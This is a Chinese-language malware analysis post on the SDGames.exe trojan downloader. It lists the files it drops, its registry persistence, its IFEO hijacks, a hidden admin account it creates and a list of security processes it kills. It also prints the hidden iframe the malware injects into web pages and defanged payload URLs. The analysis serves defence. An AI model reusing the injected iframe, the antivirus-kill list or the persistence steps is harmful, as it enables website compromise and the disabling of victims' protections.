小瓢虫~

文件名称:SDGames.exe
 
文件大小:59282 byte
 
A V命名
 
Trojan.Win32.VB.yth(瑞星)
Trojan-Downloader.Win32.VB.lg(卡巴斯基)
Win32.Troj.Downloader.vb.237568(金山)
 
加壳方式:北斗4.1
 
编写语言:Microsoft Visual Basic 5.0 / 6.0
 
文件MD5:fc334ffcf5aff3ca8235705d61f62990
 
行为分析:
 
1、释放病毒副本:
 
C:\WINDOWS\system32\AUTORUN.INF 149 字节
C:\WINDOWS\system32\Avpser.cmd 1446 字节
C:\WINDOWS\system32\netshare.cmd 416 字节
C:\WINDOWS\system32\SDGames.exe 59282 字节
C:\WINDOWS\system32\Taskeep.vbs 612 字节
 
A-Z盘下生成:
 
AUTORUN.INF 149 字节, RHS
Recycleds.url 98 字节, A(回收站图标)
SDGames.exe 59282 字节, RHS
Windows.url 97 字节, A
新建文件夹.url 97 字节, A(文件夹图标)
 
在生成AUTORUN.INF前,会先调用RD命令删除免疫的AUTORUN.INF(如果有)
 
2、添加启动项:
 
(1)HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
         注册表值 Winstary = "C:\windows\system32\SDGames.exe"
 
(2)修改system.ini,加入Load和Run值:
         路径为:C:\windows\system32\SDGames.exe
 
3、开启以下服务:
 
winmgmt    
lanmanserver
 
禁用以下服务:
 
Alg
sharedaccess
 
4、禁用一些系统功能,比如显示隐藏文件、扩展名、任务管理器、CMD等。
 
5、修改Reg、Txt文件关联,为:C:\windows\system32\SDGames.exe。
 
6、IFEO重定向劫持,指向:C:\windows\system32\SDGames.exe。
 
都是一些比较有名气的安全工具,另外连QQ和影子进程都不放过。
 
7、Avpser.cmd则尝试关闭一些进程(列一部分):
 
%p% RavMonD.exe
%p% RavStub.exe
%p% Anti*
%p% AgentSvr*
%p% CCenter*
%p% Rsaupd*
%p% KvReport*
%p% KvXP*
%p% KVMonXP*
%p% nter*
%p% TrojDie*
%p% avp.com
%p% KRepair.COM
%p% Trojan*
%p% avp.exe
%p% PFW.exe
%p% rising*
%p% ikaka*
%p% .duba*
%p% kingsoft*
%p% 木马*
%p% 社区*
%p% aswBoot*
%p% MainCon*
%p% Regs*
%p% AVP*
%p% Task*
%p% regedit*
%p% Ras*
%p% srgui*
%p% norton*
%p% avp*
%p% fire*
%p% spy*
%p% bullguard*
%p% PersFw*
%p% KAV*
%p% ZONEALARM*
%p% SAFEWEB*
%p% OUTPOST*
%p% ESAFE*
%p% clear*
%p% MonsysNT.exe
%p% awrem32.exe
%p% WINAW32.EXE
%p% PNTIOMON.exe
%p% avgw.exe
%p% avgcc32.exe
%p% PROmon.exe
%p% PNTIOMON.exe
%p% MagicSet.exe
%p% MainCon.exe
%p% TrCleaner.exe
%p% WmNetPro.exe
%p% 修复*
%p% 保护*
 
8、添加Guest账户,为空密码,权限为Administrator。
 
9、修改系统时间,为2030年。
 
10、通过直接获得系统内存隐藏进程,防止被结束。
 
11、释放Taskeep.vbs,这个应该互斥体,防止进程有多个病毒体在运行。
 
12、结束explorer.exe进程,并ping127.0.0.1,如果通畅,会下载一个文件,然后重新启动explorer:
 
hxxp://**.icpcn.com/QQ.gif
 
其实是个PE文件,具体是什么病毒还没看,不过测试时没有实现。
 
13、查找:
 
.jsp
.asp
.php
.htm
.html
.hta
 
并插入一段代码:
 
<iframe id="iframe" width="0" height="0" scrolling="no" frameborder="0"
 
src="hxxp://zh**.10mb.cn/" name="Myframe" align="center" border="0">
 
一个伪装百度的网站,不过下面挂了一个东西:
 
hxxp://xxx.bao01.com/0.js,失效了~~
 
14、修改IE主页,为hxxp://**.10mb.cn/。
 
15、跳过C盘,然后覆盖EXE文件。。(不可能恢复),图标为瓢虫模样。
 
16、还有一些乱七八糟的,就不写了~
 
另外这病毒传播方式不是很理想,所以不写解决方法了~
 
很麻烦滴~
 
思路是:
 
1、把SDGame.exe和一些重要的文件覆盖并阻止再生。可以用PowerRmv。
 
建议暂时删除系统文件taskkill.exe、net.exe、cmd.exe。等弄好后从Dllcache恢复。
 
不然你会发现计算机响应的速度让你无法忍受。>4核的忽略这步
 
2、修正系统时间,再下载SREng修改被禁用的XX...
 
3、那些EXE只能删除了。
 
 
 
 
 
 
 
 
 
 

你可能感兴趣的:(职场,安全,病毒,休闲,SDGames.exe)